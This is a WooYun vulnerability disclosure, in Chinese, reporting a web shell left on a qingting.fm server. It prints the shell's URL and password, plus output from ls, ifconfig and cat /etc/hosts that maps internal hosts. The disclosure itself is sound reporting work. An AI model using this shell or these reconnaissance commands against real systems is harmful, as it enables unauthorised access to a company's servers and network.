当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114694

漏洞标题:蜻蜓fm某站点修复不当shell一枚

相关厂商:qingting.fm

漏洞作者: 爱上平顶山

提交时间:2015-05-18 09:16

修复时间:2015-05-23 09:18

公开时间:2015-05-23 09:18

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

...

详细说明:

蜻蜓fm
每天习惯看公开漏洞 就发现了
http://cms.qingting.fm/ 115.29.168.119
shell地址:
http://115.29.168.119/phpsso_server/uploadfile/avatar/1/1/1/3333/22.php
PW:cmd

[*] 基本信息 [ 	Linux tair-cache2 3.2.0-29-generic #46-Ubuntu SMP Fri Jul 27 17:03:23 UTC 2012 x86_64(www-data) ]
[/]$ ls -al
total 92
drwxr-xr-x 24 root root 4096 Nov 25 17:24 .
drwxr-xr-x 24 root root 4096 Nov 25 17:24 ..
drwxr-xr-x 2 root root 4096 Aug 14 2012 bin
drwxr-xr-x 3 root root 4096 Aug 14 2012 boot
drwxr-xr-x 3 root root 4096 Nov 25 16:58 data
drwxr-xr-x 13 root root 3920 Aug 22 2014 dev
drwxr-xr-x 94 root root 4096 Nov 25 17:46 etc
drwxr-xr-x 6 root root 4096 Aug 4 2014 home
lrwxrwxrwx 1 root root 33 Aug 14 2012 initrd.img -> /boot/initrd.img-3.2.0-29-generic
drwxr-xr-x 18 root root 4096 Oct 11 2013 lib
drwxr-xr-x 2 root root 4096 Oct 11 2013 lib64
drwx------ 2 root root 16384 Aug 6 2012 lost+found
drwxr-xr-x 3 root root 4096 Aug 6 2012 media
drwxr-xr-x 6 root root 4096 Aug 22 2014 mnt
drwxr-xr-x 4 root root 4096 Nov 25 17:22 opt
dr-xr-xr-x 92 root root 0 Jul 12 2014 proc
drwx------ 7 root root 4096 May 7 17:32 root
drwxr-xr-x 17 root root 620 May 7 17:31 run
drwxr-xr-x 2 root root 4096 Oct 11 2013 sbin
drwxr-xr-x 2 root root 4096 Mar 6 2012 selinux
drwxr-xr-x 8 root root 4096 Feb 21 2014 srv
drwxr-xr-x 13 root root 0 Jul 12 2014 sys
drwxrwxrwt 4 root root 4096 May 17 21:46 tmp
drwxr-xr-x 10 root root 4096 Aug 6 2012 usr
drwxr-xr-x 12 root root 4096 Jul 11 2014 var
lrwxrwxrwx 1 root root 29 Aug 14 2012 vmlinuz -> boot/vmlinuz-3.2.0-29-generic
[/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3e:00:00:79
inet addr:10.161.160.154 Bcast:10.161.175.255 Mask:255.255.240.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:78525121850 errors:0 dropped:0 overruns:0 frame:0
TX packets:59586094348 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7717644743701 (7.7 TB) TX bytes:8608882769850 (8.6 TB)
Interrupt:79
eth1 Link encap:Ethernet HWaddr 00:16:3e:00:00:7a
inet addr:115.29.168.119 Bcast:115.29.171.255 Mask:255.255.252.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3385845258 errors:0 dropped:0 overruns:0 frame:0
TX packets:1555647032 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:178045428627 (178.0 GB) TX bytes:104083414530 (104.0 GB)
Interrupt:80
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:29569487305 errors:0 dropped:0 overruns:0 frame:0
TX packets:29569487305 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:5492121412970 (5.4 TB) TX bytes:5492121412970 (5.4 TB)
[/]$ uname -a
Linux tair-cache2 3.2.0-29-generic #46-Ubuntu SMP Fri Jul 27 17:03:23 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[/]$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 ubuntu
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
42.121.18.19 ldap.qingting.fm
10.160.3.201 tair1
10.160.3.202 tair2
10.200.113.236 tair3
10.200.113.233 tair4
10.200.113.237 tair5
10.200.113.234 tair6
10.161.160.153 tair-cache1
10.161.160.154 tair-cache2
10.132.11.47 zk1
10.132.20.38 zk2
[/]$


0.jpg


1.jpg


ok 排查吧

漏洞证明:

···

修复方案:

运维加强.

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-23 09:18

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无